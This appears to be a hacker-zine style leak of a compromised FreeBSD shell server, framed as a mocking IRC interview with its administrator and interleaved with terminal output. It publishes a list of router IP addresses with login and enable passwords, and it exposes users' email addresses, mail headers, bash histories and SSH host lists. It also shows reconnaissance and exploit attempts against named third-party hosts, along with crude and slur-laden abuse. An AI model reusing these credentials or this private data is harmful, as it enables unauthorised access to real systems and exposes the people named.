fakepmap.c* tmp/
fbsd2.c* tranny.asc*
foodfight.swf* tronban*
freebsd.app* tsl_bind.c*
freebsd.app.old* vchans.txt*
h0h0cc.asc* wanker-14.jpg
hardcopy.0 wctb.irc*
hm/ wu2.6.1.c*
ircchiq.tar www/
kline* xf0rce.zip
libproxybnc-2.0b.tar.gz
<r0b1nleech> Wow, what an absolutely stunning home directory, you
+ so elegantly define caviar dreams.
<pm> i try, hehe, thanks r0b1n
<r0b1nleech> Ok, show us some of your files
<pm> why of course
$ head imnotownedstill.txt
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :gobbles sucks balls
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :we should make them eat our shit
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :then shit out our shit
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :then make them eat the the shit that they shit that was our shit that we made them eat
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :*read slowly*
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :GOBBLES:
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :"ALL YOU MOTHER FUCKERS ARE GONNA PAY, YOU ARE THE ONES WHO ARE THE BALL LICKERS, WE'RE GONNA FUCK YOUR MOTHERS WHILE YOU WATCH AND CRY LIKE LITTLE WHINEY BITCHES, ONCE WE GET TO HOLLYWOOD AND FIND THOSE MIRAMAX FUCKS WHOS MAKEN THE MOVE WE'RE GONNA MAKE THEM EAT OUR SHIT THEN SHIT OUT OUR SHIT AND THEN EAT THEIR SHIT THATS MADE UP OF OUR SHIT THAT WE MADE THEM EAT AND THEN ALL YOU MOTHERFUCKS ARE NEXT"
:p_m!dave@right.behind.you PRIVMSG #!w00w00 :-w00w00
<pm> ok lets see, ah, shells is a pretty private file, i use it for
+ hacking elite shit.
# head -n 20 shells
12.0.40.1 - cisco
12.127.196.202 - cisco1:cisco
131.192.70.218 (s0.inso.bbnplanet.net) - cisco
157.130.68.154 (rutenberg-gw.customer.ALTER.NET) - cisco:cisco
192.195.18.6 (cisco.nstor.com) - cisco
194.149.131.1 (e0-rbs1.MARNet.mk) - gone:quattro224 / ena:%qqriq%
194.149.131.10 (e0-0-rbs3.MARNet.mk)
194.149.131.127 (tc.rek.ukim.edu.mk) - gone:quattro224 / ena:%qqriq%
194.149.131.3 (e0-rbs2.UKIM.edu.mk)
194.149.144.1 - gone:mitre-strelata / ena:rtremt-toboim
194.149.148.2 (rtrzsv.zsv.ukim.edu.mk) - gone:quattro224 / ena:%qqriq%
194.149.150.1 - gone:quattro224 / ena:%qqriq%
194.98.212.19 (bowne-gw.iway.fr) - cisco
200.41.13.242 (200.41.13.242.celcaribe.net) - admin:admin
200.41.13.253 (200.41.13.253.celcaribe.net) - admin:admin
202.109.81.230 - cisco:cisco (switch)
202.161.128.22 - cisco
202.54.40.17 - cisco:cisco
204.167.134.158 (s0.aww.bbnplanet.net) - test:test
207.115.184.1 - cisco
<r0b1nleech> Oh, My, God, are those seriously .edu.mk routers?!
<pm> :)
<pm> ok check this out
# ls Mail
4166174806@mobile.att.net jack@google.com spider@funksion.org
beep-spider@jsnet.com knowfx@sneakerz.org spider@hotmail.com
beepspider@jsnet.com monk@sneakerz.org spider@sneakerz.org
binary@ruiner.halo.nu paul@mu.org sweetiegirl331@aol.com
bright@wintelcom.net promo@akula.com walt@hotmail.com
dav@sneakerz.org soupnazi@sneakerz.org
<pm> i met sweetiegrl331 in #linuxteens, damn shes amazing
<r0b1nleech> Love :)
<r0b1nleech> Hey, I noticed a route.gif in the above output of ls?
<pm> thats route naked at r00tparty 3.
<pm> enough with my homedir for a second, lets check out ratcorpse's
# cd /home/users/rat
# ls
Mail/ funny* me-modified.jpg* rc.c*
adaptec gogo226a.tgz me-original.jpg* shrt*
ass2.doc* hahaha mp3s.txt* sk8.bx*
badass.jpg hehh* ncurses.h sk8.irc*
blingbling.jpg index.html* netscape1.c.txt* term.h
buffr.c* ircrc.example* newfris.jpg* tmp/
damnfunny ircrc.global* ns* tron.txt*
dickd.tar.gz* jim* orange1.jpg url*
elite.c* leto* pageexec.txt* vas0103.txt*
epic* llist.c* patch-howto.html vhosts*
f* log.txt r* wargames*
fefe.zip* mbox rand0m.c* www/
<pm> shes so funny, check out the www
# ls www/
06cubicl.jpg* leet.adv* pumpkin.jpg*
Bow-lusta.txt* lice420pre7.tar* resume*
OBSDecian* links.html* route.gif*
akittens-confessionz* list* route.jpg*
angieb.jpg* logs.html* rpclogo.jpg*
crow/ look.jpg* s/
cvf-sk00led* m1x* sexchart*
cvf-sk00led2* me.gif* shot/
dance.gif* me.html* siphon-v.7.tar*
duke/ misc/ slut1.jpg*
dumbkitten.txt* mixowned* slut2.jpg*
dxmd.jpg* modified.jpg* some-funny-ass-takeover*
dxmpix/ p.jpg* sundevices.beta*
freestyle* pageexec.txt* toomuchtime.jpg*
fugly/ party/ u4ea-skooled*
ghettodxm.jpg* phat1.jpg* url*
gookfest.jpg* phat2.jpg* war*
greets.html* phat3.jpg* warped.jpg*
gross/ phat4.jpg* weed.jpg*
housewarming.jpg* phracklog* whore.jpg*
hp2.adv* pix/ work/
in-bud-we-trust.jpg* potleaf1.jpg*
index.html* prankster.jpg*
<pm> lol, thats confidence
<r0b1nleech> This is great, are you getting all of this guys?
<pm> hohohoho check this out
# cat mailstuff | less
bright:> To: bright@sneakerz.org
bright:Delivered-To: alfred@freebsd.org
bright:Delivered-To: bright@sneakerz.org
bright:Errors-To: announce-admin@bafug.org
bright:Reply-To: Bill Fumerola <billf@mu.org>
bright:Reply-To: Majordomo@FreeBSD.ORG
bright:Reply-To: jgrosch@mooseriver.com
bright:To: "Alfred Perlstein" <bright@sneakerz.org>
bright:To: "Nick Stee." <snicko@noid.org>
bright:To: <bright@sneakerz.org>
bright:To: Alfred Perlstein <bright@sneakerz.org>
bright:To: Bill Fumerola <billf@elvis.mu.org>
bright:To: Jonathan Lemon Alfred Perlstein <bright@sneakerz.org>
bright:To: Josef Grosch <jgrosch@mooseriver.com>
bright:To: Nick S. <snicko@noid.org>
bright:To: Tor.Egge@fast.no
bright:To: alfred@productionbsd.com
bright:To: alfred@wintelcom.net
bright:To: alfred@wintelcom.net (Alfred Perlstein)
bright:To: announce@bafug.org
bright:To: bright@sneakerz.org
cr:Delivered-To: cr@sneakerz.org
cr:Delivered-To: dial.pipex.com-moduspublicity@dial.pipex.com
cr:Delivered-To: mailing list distinctiverecords@listbot.com
cr:Disposition-Notification-To: "RetrO" <r3tro@eresmas.com>
cr:Reply-To: <aidan.clarke@itacsecurity.com>
cr:Reply-To: <keith@ticketweb.co.uk>
cr:Reply-To: confirm-sub-U-EmGb9P23-UBpOrf15CIYImMZ8@yahoogroups.com
cr:Reply-To: confirm-sub-UBu_9nyHo3zeNMDbohWPyl-AC60@yahoogroups.com
cr:Reply-To: freestyle@breakbeat.com
cr:Reply-To: gay@breakbeat.com
cr:Reply-To: root@sneakerz.org
cr:To: "'cr@sneakerz.org'" <cr@sneakerz.org>
cr:To: "CafePress.com Member" <reply@cafepress.com>
cr:To: "Zarul" <zarulsa@pc.jaring.my>,
cr:To: "cr" <cr@sneakerz.org>
cr:To: <Undisclosed-Recipient:@post.webmailer.de;>
cr:To: <cr@sneakerz.org>
cr:To: <sjd@tpg.com.au>
cr:To: <soniatoby.soto@virgin.net>
cr:To: List Member <cr@sneakerz.org>
cr:To: List Owner <cr@sneakerz.org>
cr:To: ListBot Member <cr@sneakerz.org>
cr:To: Rob Davis ; Rob Hives ; Rob Mac ; Rob Wood ; Toby Martin (E-mail) ; =
cr:To: Scott Douglas <sjd@tpg.com.au>
cr:To: Trevor Wyatt ; Trevor Nelson ; trax ; Tracie storey ; tee bone ; =
cr:To: cr@sneakerz.org
cr:To: cr@sneakerz.org <cr@sneakerz.org>
cr:To: jody.melbourne@itacsecurity.com
cr:To: pm@sneakerz.org
cr:To: r0n/ Patch / Buddha Man / PLS <rpm@airmail.net>
cr:To: rpm@airmail.net
cr:To: undisclosed-recipients:;
cr:To: www.inbox.net@airmail.net
cr:X-Envelope-To: moduspublicity@dial.pipex.com
desl:Delivered-To: desl@sneakerz.org
desl:To: Dan Lennon <desl@sneakerz.org>
desl:To: desl@sneakerz.org
g:Delivered-To: g@sneakerz.org
g:Reply-To: "eBay Marketing" <marketing@welcome.ebay.com>
g:Reply-To: "eBay" <marketing@welcome.ebay.com>
g:Reply-To: Sales@MDaemon.com
g:Reply-To: eBay's Scoot Pursuit <scoot.pursuit@optin.com.au>
g:Reply-To: update@update.deerfield.com
g:To:
g:To: "Glen Messenger (E-mail)" <g@sneakerz.org>
g:To: "Morrison, Garth" <Garth.Morrison@act.gov.au>,
g:To: g@sneakerz.org
g:To: valued_customer@deerfield.com
g:X-MDaemon-Deliver-To: g@sneakerz.org
james:>Delivered-To: josh@strangled.net
james:>To: Joshua Anderson <josh@strangled.net>
james:Apparently-To: <alanst@tranquility.net>
james:Apparently-To: <albright@tranquility.net>
james:Apparently-To: <audrey@tranquility.net>
james:Apparently-To: <cbaker@tranquility.net>
james:Apparently-To: <christy@tranquility.net>
james:Apparently-To: <cmcs@tranquility.net>
james:Apparently-To: <dano@tranquility.net>
james:Apparently-To: <kallen@tranquility.net>
james:Apparently-To: <robs@tranquility.net>
james:Delivered-To: <james@sneakerz.org>
james:Delivered-To: james@sneakerz.org
james:Delivered-To: james@strobe.org
james:Errors-To: online1@wellsfargo.m0.net
knowfx:>To: ms Essive <edifast@hotmail.com>
knowfx:Delivered-To: dskz-outgoing@informationwave.net
knowfx:Delivered-To: dskz@informationwave.net
knowfx:Delivered-To: knowfx@sneakerz.org
knowfx:Delivered-To: mailing list isn@securityfocus.com
knowfx:Delivered-To: mailing list staff@staff.neethosting.com
knowfx:Delivered-To: moderator for isn@securityfocus.com
knowfx:Errors-To: admins-errors@java.blackened.com
knowfx:In-Reply-To: <2004@ravine.binary.net> from "redmare" at
Mar 23, 2001 01:02:39 PM
knowfx:In-Reply-To: <2033@java.blackened.com>; from rockwood@concentric.net
knowfx:In-Reply-To: <2087913@java.blackened.com>; from rockwood@concentric.net
knowfx:In-Reply-To: <200@java.blackened.com> "from Jill Luster
knowfx:In-Reply-To: <OE41@LocalDomain> from Scott
knowfx:Reply-To: dskz@informationwave.net
soupnazi:Reply-To: "Anissa" <anissaho@look.ca>
soupnazi:Reply-To: "Nuno Fernandes" <nfernandes@real-secure.com>
soupnazi:Reply-To: <Cbrinson@apexsystemsinc.com>
soupnazi:Reply-To: <cokeworld@ureach.com>
soupnazi:Reply-To: Nightlife-feedback-25@lb.bcentral.com
soupnazi:Reply-To: jeff@altaassociates.com
soupnazi:Reply-To: orders@crutchfield.com
suid:Delivered-To: BUGTRAQ@securityfocus.com
suid:Delivered-To: bugtraq@lists.securityfocus.com
suid:Delivered-To: bugtraq@securityfocus.com
suid:Delivered-To: suid@sneakerz.org
suid:In-Reply-To:
suid:Reply-To: root@sneakerz.org
suid:Reply-To: suid@SNEAKERZ.ORG
suid:To:
suid:To: (Recipient list suppressed)
suid:To: <suid@sneakerz.org>
suid:To: BUGTRAQ@SECURITYFOCUS.COM
suid:To: Kris Hunt <suid@sneakerz.org>
suid:To: Suid <suid@sneakerz.org>
suid:To: suid@SNEAKERZ.ORG
suid:To: suid@sneakerz.org
suid:X-To: h@CKZ.ORG
yowie:Delivered-To: yowie@sneakerz.org
yowie:To: Yowie <yowie@sneakerz.org>
<pm> haha, ok check this out
<pm> oh by the way, I HAVE NEVER BEEN OWNED, AND ALL YOU FUCKERS WHO SAY
+ YOU OWN ME, YOU DONT OWN SHIT YOU ARE JUST A BUNCH OF COWARDS AND
+ SCRIPT KIDDIES WHO DONT KNOW JACK SHIT ABOUT ANYTHING.
# cd /root
# cat .bash_history|less
ls
more doimport
cd src
ls
make
pwd
ls -la
cd ..
lso
ls
sh doimport
top
top
w
ps -aux | grep zmagic
ps -auwwx | grep zmagic
w
netstat 1
top
w
ps -aux | grep zmagic
watch -W p7
w
top
top
w
ps -aux | grep irc
kill -9 9989
ps -aux | grep zmagic
w
w
top
top
w
top
w
ls
top
ls
ls -la
top
cd /home/users/zmagic/
ls
ls- la
ls -la
top
top
last zmagic
top
ls
top
cd /home/users/par
ls
ls -al
cd ..
cd /home/users/rat
ls -al
head haha
less -R IrcLog
cd /home/staff/ps
ls -al
less .bash_history
ps -aux | grep soupnazi
watch -W p9
cd /usr/src
ls
cd /usr/src
ls
ls -la
cd /shit/FreeBSD4/
ls
more doimport
cd /shit/FreeBSD4/
ls
cd cvs/
ls
ls -la
cd src
ls
ls -la
cd /shit/FreeBSD4/
ls
cd svc
cd cvs
ls
cd src/
ls
ls -la
make buildworld
ls
ls
cvs
cvs import
cd /usr/src
cvs import
cvs update
ls
pwd
ls
ls-la
ls -l
cd sys
ls
ls -l
date
cd ..
ls
pwd
cd sys
ls
locate newvers.sh
cd /usr/src/sys/conf/
ls
df
cu -l cuaa0
cd /eyc
cd /etc
ls
cd namedb/
ls
cd
cd /usr/ports/
ls
cd net/
whereis named
whereis bind
ls
cd ..
ls
cd sysutils/
ls
cd ..
ls
whereis bind
whereis bind8
cd net/
ls
cd bind8/
make install all
cd /etc
ls
cd namedb/
ls
ci named.conf
vi named.conf
who
w
write josh
who
vvcc
c
who
w
ps -ax
cd /etc
ls
who
w
vi named.conf
vi named.conf
vi named.conf
ls
sh make-localhost
ls
vi localhost.rev
ls
rm localhost.rev
ls
vi named.conf
vi db.127.0.0
vi db.127.0.0
ls
pwd
w
ls
vi named.conf
vi db.207.154.226
ls
vi db.sneakerz
ls
who
cd /etc/namedb/
ls
cd /var/log
ls
tail messages
vi /etc/rc.conf
ifconfig -a
grep named /etc/defaults/rc.conf
vi /etc/rc.conf
ls
vi /etc/rc.conf
ls
cd
ls
cd /home/dave
l;s
cd /home
ls
cd /home/dave
l;s
cd /home
ls
cd staff/
ls
cd ps
ls
cd ..
cd josh/
ls
cd ..
cd dave
ls
ls -al
cd
vi /etc/group
ls
ndc start
whereis ndc
tail messages
ssh -p220 dave@t1.google.com
who
cd /usr/ports/
ls
cd irc
ls
cd epic4/
ls
make install all
ls
cd
cd /usr/ports/
ls
cd irc
ls
who
write root
ssh -p220 dave@t1.google.com
who
telnet 0 21
who
ps -ax
ssh -p220 dave@t1.google.com
epic
w
su - dave
write root
w
vi /etc/inetd.conf
cd
su - dave
killall -HUP inetd
su - dave
write root
write root
su - dave
cd /usr/ports/www/
ls
cd w3m
su - monk
su - dave
cd /home/staff/
ls -l josh/
ls -l ps/
cd
su - dave
write ps
w
cd /home/nm
cd /home/ncvs/
ls
screen vi setuid.today
grep rc.local /etc/*
vi /etc/rc.local
vi /etc/virtualip
sh /etc/rc.local
ifconfig -a
w
w
df
w
w
dmesg
grep smurf /usr/ports/INDEX
cd /usr/ports/security/smurflog/
ls
make
w
dmesg
top
w
ifconfig -a
tcpdump
find /sbin -perm 4000
find /sbin -perm -1000
ps ax
ls -l /sbin
df
less /var/log/setuid.today
grep root /var/log/messages
top
last jimjones
w
hostname
we
e
w
ps -ax
cd /home
ls
cd staff/
ls
cd /usr/local/apache/htdocs/
ls
more index.html
cd /shit/FreeBSD4/
cvsup -L 2 supfile
export HOME=/root
ls
pwd
ls -la
more /home/staff/ps/.bash_history
top
more /home/staff/ps/.bash_history
ht
mutt
<pm> thats history in the making
<r0b1nleech> Looking at your history files makes me want to read SECURING LINUX
+ IN 21 DAYS, all over again. Caviar dreams pm, caviar dreams.
<pm> yah hehe
<pm> did you see me ssh into google.com? wish you had my password huh? :)
<r0b1nleech> :D
<pm> ok i got so much stuff for your wonderful tv show
# cd /
# cat sshstuff1 | less
home/users/billf/.bash_history:ls -l .ssh/authorized_keys
home/users/billf/.bash_history:ls .ssh/
home/users/billf/.bash_history:mkdir .ssh
home/users/billf/.bash_history:vi .ssh/authorized_keys
home/users/billf/.bash_history:vi .ssh/authorized_keys
home/users/cr/.bash_history:ssh -lcr el8.net
home/users/cr/.bash_history:ssh -lcr meth.lab.org
home/users/cr/.bash_history:ssh -lrogue puck.nether.net
home/users/cr/.bash_history:ssh -ls33r freenet.nether.net
home/users/james/.bash_history:ssh 209.63.220.137
home/users/james/.bash_history:ssh 64.38.245.135
home/users/james/.bash_history:ssh 64.38.247.160
home/users/james/.bash_history:ssh 64.38.247.180
home/users/james/.bash_history:ssh afraid.org
home/users/james/.bash_history:ssh cb2.kglimited.net
home/users/james/.bash_history:ssh ns1.kglimited.net
home/users/mux/.bash_history:mkdir .ssh
home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2
home/users/scott/.bash_history:ssh -l skl pav-l1.hotmail.com
home/users/scott/.bash_history:ssh mu.org
home/users/suid/.bash_history:cd .ssh
home/users/suid/.bash_history:ssh -l suid CPE-61-9-178-2.vic.bigpond.net.au
home/users/walt/.bash_history:ssh 216.32.183.201
home/users/walt/.bash_history:ssh -p 216.32.183.201
home/users/walt/.bash_history:ssh 216.32.183.201
home/users/walt/.bash_history:ssh 216.32.183.201 -P
home/users/walt/.bash_history:ssh aaronsca@mu.org
home/users/walt/.bash_history:ssh pav-l1.hotmail.com
# cat scpstuff1 | less
home/users/mux/.bash_history:scp mux.dyn.dhs.org:.ssh/id_dsa.pub .ssh/authorized_keys2
home/users/oobe/.bash_history:scp -v bzImage 64.208.38.1:.
home/users/oobe/.bash_history:scp -v bzImage root@64.208.38.2:.
home/users/oobe/.bash_history:scp bzImage root@64.208.38.2:.
home/users/oobe/.bash_history:scp bzimage root@64.208.38.2:.
home/users/scott/.bash_history:scp evanw16.Imagine.IL.US.NeverNET.Net 62.252.9.43:~/
home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36,180:.
home/users/yowie/.bash_history:scp xf0rce.zip yowie@61.12.36.180:.
<r0b1nleech> Ok pm, I am so so so so so sorry to interrupt you, but can
+ you please show me cr's history file?
<pm> that, i can do
<r0b1nleech> UNIX BOWLERS!
# cd /home/users/cr
# less .bash_history
ls -l /dev/null
ls -la .bash_history
rm .bash_history
grep HIST .*
set
vi .profile
screen -r
mutt
screen -r
screen -r
telnet mail.itacsecurity.com 110
telnet mail.itacsecurity.com 110
telnet mail.itacsecurity.com 110
mail
telnet mail.itacsecurity.com 25
screen -r
screen -r
host -l workcover.com
telnet www.sb.workcover.com 80
telnet www.sb.workcover.com 443
telnet www.sb.workcover.com 21
ftp www.sb.workcover.com
more passwd
rm passwd
telnet www.sb.workcover.com 23
telnet www.sb.workcover.com 22
telnet www.sb.workcover.com 25
telnet www.sb.workcover.com 110
telnet www.sb.workcover.com 513
telnet www.sb.workcover.com 79
telnet www.sb.workcover.com 111
host -l workcover.com
telnet 150.101.73.34 v21
telnet 150.101.73.34 21
telnet 150.101.73.34 22
telnet 150.101.73.34
telnet 150.101.73.35 80
telnet 80
telnet 192.231.203.33 80
telnet 192.231.203.33 21
telnet 192.231.203.33 111
telnet 192.231.203.33 110
telnet 192.231.203.33 22
telnet 192.231.203.33 25
telnet 192.231.203.33 79
whisker.pl
host -l workcover.com.au
host -l workcover.com
telnet www.workcover.com 80
telnet www.internal.workcover.com 80
telnet internal.workcover.com 80
telnet www.school.workcover.com 80
telnet www.users.on.net 110
telnet www.users.on.net 21
nmap 150.101.73.34
exit
ls -l
screen -r
slookup right.behind.you
nslookup right.behind.you
screen -r
script work
ls -l work
gzip work
chmod a-r work.gz
ls -l
screen -r
nslookup www.e-safety.sa.gov.au
host -l e-safety.sa.gov.au
host -l sa.gov.au
mutt
screen -r
screen -r
exit
mutt
exit
host -l workcover.com
host -l internal.workcover.com
z0ne
nslookup 150.101.73.100
nslookup 150.101.73.101
nslookup 150.101.73.1
nslookup 150.101.73.2
nslookup 150.101.73.34
nslookup 150.101.73.35
nslookup 150.101.72.1
nslookup 150.101.72.2
screen -r
exit
mutt
screen -r
mutt
screen -r
bx cr_ irc.idle.net
screen -r
more wu261.c
more wu261.c
more wu2.6.1.c
more rh7linuxconf.pl.txt
mutt
screen -r
screen -r
mutt
screen 0r
screen -r
mutt
exit
mutt
screen -r
screen -r
slookup itac1.lnk.asionline.net
nslookup itac1.lnk.asiaonline.net
nslookup itac1.lnk.cbr.asiaonline.net
host -l lnk.asiaonline.net
host -l lnk.cbr.asiaonline.net
host -l cbr.asiaonline.net
nslookup itac1.sbr.asiaonline.net
nslookup itac1.cbr.asiaonline.net
screen -r
mutt
screen -r
screen -r
mutt
exit
ls
exit
ls
cp admtac0s-bin.gz www
lynx sneakerz.org/~cr
ls
ls -la
screen -r
screen -r
screen -r
*.c
ls *.c
screen -r
more wu2.6.1.c
screen -r
grep site wu*.c
screen -r
more wu261.c
screen -r
more wu261.c
screen -r
screen -r
ls
screen -r
ls
more linuxconf.c
ssh -ls33r freenet.nether.net
telnet freenet.nether.net
telnet freenet.nether.net 21
telnet puck.nether.net 22
ssh -lrogue puck.nether.net
screen -r
ar zxvf linuxconf-xpl.tar.gz
tar zxvf linuxconf-xpl.tar.gz
more linuxconf-xpl.
more linuxconf-xpl.c
screen -r
s
ls
screen -r
screen -r
ssh -lcr el8.net
screen -r
exit
screen -r
exit
screen -r
exit
set
export TERM=vt100
screen -r
cd www
;s
ls
mail guy@breakbeat.com
screen -r
telnet 150.101.73.100 80
telnet 150.101.73.100 80
telnet 150.101.73.100 80
screen -r
ls
ls *.c
screen -r
screen -r
ls
ls *.c
screen -r
mutt
exit
mutt
screen -r
export IRCNAME="flip the track, bring the oldschool back"
bx cr irc.mcs.net
screen -S ef bx cr irc.mcs.net
telnet 150.101.73.100 80
telnet 150.101.73.100 80
screen -r
screen -r
exit
screen -r
lynx www.apache.org
lynx www.slashdot.org
lynx www.slashdot.org
lynx www.slashdot.org
lynx www.slashdot.org
screen -r
exit
screen -r
mutt
tar zxvf work.gz
tar zxvf route_finder.tar.gz
cd rf
ls -l
more route_finder
more word_route_finder
screen -r
ls
more route_finder
ls
more word_route_finder
ls
cd ..
ls
exit
mutt
screen -r
ls
cd rf
ls
more words
rm words
ls
ls -la
cd ..
ls *.tar.gz
screen -r
exit
mutt
screen -r
w
screen -r
ls -la
more linuxconf-xpl.c
screen -r
ls
exit
screen -r
mutt
screen -r
telnet 150.101.73.100 80
screen -r
exit
mutt
screen -r
host -l workcover.com
dig @workcover.com any any
telnet 150.101.73.100 80
telnet 150.101.73.100 53
sscreen -r
traceroute
traceroute 150.101.73.34
screen -r
bx cr irc.oz.org
screen -r
nslookup 203.53.186.41
nslookup 203.53.186.1
mutt
screen -r
telnet www.afp.gov.au 80
head 3.c
screen -r
mail buo@ussrback.com
date
screen -r
ls
cat 3.c |mail buo@ussrback.com
screen -r
mutt
screen -r
clear
cd .hi
cd rf
ls
more route_finder
ls
more word_route_finder q
ls
screen -r
ls
more 1.c
more 1.c
ls
more 3.c
ls
ls *.c
more fbsd2.c
more fbsd.c
more fbsd.c
gcc fbsd.c -o fbsd
./fbsd
./fbsd 0
screen -r
more fbsd.c
qtail fbsd.c
tail fbsd.c
screen -r
ssh -lcr meth.lab.org
screen -r
ssh -lcr el8.net
screen -r
nmap
ls
more crpron
cd ..
screen -r
telnet www.horseland.com 80
telnet www.horseland.com 443
screen -r
screen -r
mutt
screen -r
screen -r
vi
cat pro |cut -f2 -d" "
cat pro |cut -f2 -d" ">> pro2
more pro2
rm pro*
screen -r
screen -r
bx cr irc.dal.net
bx cr irc.austnet.org
bx cr irc.undernet.org
screen -r
exit
screen -r
nc
find / -name nc -print 2>/dev/null
screen -r
screen -r
mutt
screen -d -r
box to even get questioned by the feds in .au though
mutt
exit
<pm> hahahaha
<r0b1nleech> pm, I can't stop but ask, why was cr doing nslookup on
+ right.behind.you?
<pm> LOL
<pm> im laughing my ass off
<pm> it also looks like he tried to own my system with that fbsd.c shit
<pm> i should kick all these users off and add more elite ones, more
+ w00w00 people.
# cd /
# cat bitchxstuff1 | less
-rw-r----- 1 cr users 832281 home/users/cr/.BitchX/BitchX.away
-rwx------ 1 g users 29427 home/users/g/.BitchX/BitchX.away*
-rw-r----- 1 mux users 38061 home/users/mux/.BitchX/BitchX.away
-rw-r----- 1 suid users 270331 home/users/suid/.BitchX/BitchX.away
-rw------- 1 udp users 5229 home/users/udp/.BitchX/BitchX.away
-rw-r----- 1 zmagic users 4312 home/users/zmagic/.BitchX/BitchX.away
<r0b1nleech> cr's away file is huge :D
<pm> i will show it to you later during our private session
<pm> i would also like to reiterate that I HAVE NEVER BEEN OWNED. ONE DAY
+ THE POWER SUPPLY BLEW UP BECAUSE A TERMITE ATE THE WOOD CASING. MY
+ SYSTEM IS NOT DOWN BECAUSE IT WAS HACKED, IT HAS NEVER BEEN HACKED, AND
+ NONE OF YOU CAN HACK IT. IF ANYONE CAN HACK IT, SHIT, I WILL GIVE THEM
+ A BLOWJOB COURTESY OF SNEAKERZ (TM) NETWORKS.
<pm> r0b1n, people on my system ssh (not telnet) to some of the most
+ incredible and secure systems in the universe, take a look see
# cd /
# cat sshstuff2 | less
home/staff/monk/.ssh/known_hosts:funksion.org
home/staff/monk/.ssh/known_hosts:9mm.com
home/users/awnex/.ssh/known_hosts:shadowside.org
home/users/billf/.ssh/known_hosts:elvis.mu.org
home/users/billf/.ssh/known_hosts:hate.chc-chimes.com
home/users/bright/.ssh/known_hosts:hardcode.wintelcom.net
home/users/cr/.ssh/known_hosts:ns6.siteleader.net
home/users/cr/.ssh/known_hosts:meth.lab.org
home/users/cr/.ssh/known_hosts:61.12.32.120
home/users/cr/.ssh/known_hosts:titus.visual.com
home/users/cr/.ssh/known_hosts:www.breakbeat.com
home/users/cr/.ssh/known_hosts:breakbeat.com
home/users/cr/.ssh/known_hosts:wstrn.com
home/users/cr/.ssh/known_hosts:puck.nether.net
home/users/cr/.ssh/known_hosts:el8.net
home/users/g/.ssh/known_hosts:198.142.183.24
home/users/g/.ssh/known_hosts:yowie.kg
home/users/g/.ssh/known_hosts:198.142.196.172
home/users/g/.ssh/known_hosts:203.28.37.130
home/users/g/.ssh/known_hosts:breakbeat.web.us.uu.net
home/users/james/.ssh/known_hosts:atlantis.tranquility.net
home/users/james/.ssh/known_hosts:0
home/users/james/.ssh/known_hosts:shell1.tranquility.net
home/users/james/.ssh/known_hosts:blacklight.strobe.org
home/users/james/.ssh/known_hosts:bl.strobe.org
home/users/james/.ssh/known_hosts:206.152.119.225
home/users/james/.ssh/known_hosts:tranq3.tranquility.net
home/users/james/.ssh/known_hosts:afraid.org
home/users/james/.ssh/known_hosts:stats.paycounter.com
home/users/james/.ssh/known_hosts:63.195.184.43
home/users/james/.ssh/known_hosts:63.195.184.247
home/users/james/.ssh/known_hosts:63.195.184.126
home/users/james/.ssh/known_hosts:ns1.wintelcom.net
home/users/james/.ssh/known_hosts:tranq1.tranquility.net
home/users/james/.ssh/known_hosts:jobe.strobe.org
home/users/james/.ssh/known_hosts:strobe.org
home/users/james/.ssh/known_hosts:64.166.225.94
home/users/james/.ssh/known_hosts:mir.base16.org
home/users/james/.ssh/known_hosts:home.afraid.org
home/users/james/.ssh/known_hosts:cb1.wintelcom.net
home/users/james/.ssh/known_hosts:12.153.162.137
home/users/james/.ssh/known_hosts:64.38.247.160
home/users/james/.ssh/known_hosts:64.38.247.180
home/users/james/.ssh/known_hosts:cb2.kglimited.net
home/users/james/.ssh/known_hosts2:afraid.org
home/users/james/.ssh/known_hosts2:c191933-b.clmba1.mo.home.com
home/users/james/.ssh/known_hosts2:home.strobe.org
home/users/knowfx/.ssh/known_hosts:132.170.44.44
home/users/james/.ssh/known_hosts2:home.strobe.org
home/users/knowfx/.ssh/known_hosts:132.170.44.44
home/users/knowfx/.ssh/known_hosts:neethosting.com
home/users/mux/.ssh/known_hosts2:mux.dyn.dhs.org
home/users/oobe/.ssh/known_hosts:64.208.38.2
home/users/par/.ssh/known_hosts:65.5.27.115
home/users/par/.ssh/known_hosts:65.5.27.252
home/users/rat/.ssh/known_hosts:port44.dorms44.ucf.edu
home/users/reject/.ssh/known_hosts2:zap.netfrag.com
home/users/scott/.ssh/known_hosts:mu.org
home/users/scott/.ssh/known_hosts:62.252.9.43
home/users/scott/.ssh/known_hosts:pav-l1.hotmail.com
home/users/soupnazi/.ssh/known_hosts:216.240.185.234
home/users/soupnazi/.ssh/known_hosts:209.191.170.8
home/users/soupnazi/.ssh/known_hosts:noodle-soup.fortunecity.com
home/users/soupnazi/.ssh/known_hosts:postal1.fortunecity.com
home/users/soupnazi/.ssh/known_hosts:lower.org
home/users/soupnazi/.ssh/known_hosts:132.170.44.44
home/users/soupnazi/.ssh/known_hosts:jimjones.niggacrazy.com
home/users/soupnazi/.ssh/known_hosts:legion2000.net
home/users/soupnazi/.ssh/known_hosts:shell.openhack.com
home/users/soupnazi/.ssh/known_hosts:ws1.nhl.com
home/users/soupnazi/.ssh/known_hosts:www.djalterego.com
home/users/soupnazi/.ssh/known_hosts:ws4temp.nhl.com
home/users/soupnazi/.ssh/known_hosts2:209.191.170.220
home/users/spider/.ssh/known_hosts:64.172.12.3
home/users/suid/.ssh/known_hosts:kernel.net
home/users/suid/.ssh/known_hosts:jawa.chilli.net.au
home/users/suid/.ssh/known_hosts:yowie.kg
home/users/suid/.ssh/known_hosts:61.12.32.120
home/users/suid/.ssh/known_hosts:ninjastrike.com
home/users/suid/.ssh/known_hosts:cpe-61-9-146-112.vic.bigpond.net.au
home/users/suid/.ssh/known_hosts:61.9.146.112
home/users/udp/.ssh/known_hosts:port44.dorms44.ucf.edu
home/users/udp/.ssh/known_hosts:coalesce.underworld.net
home/users/udp/.ssh/known_hosts:boredom.org
home/users/udp/.ssh/known_hosts:voodooland.net
home/users/udp/.ssh/known_hosts:leviathan.org
home/users/udp/.ssh/known_hosts:fire.efnet.org
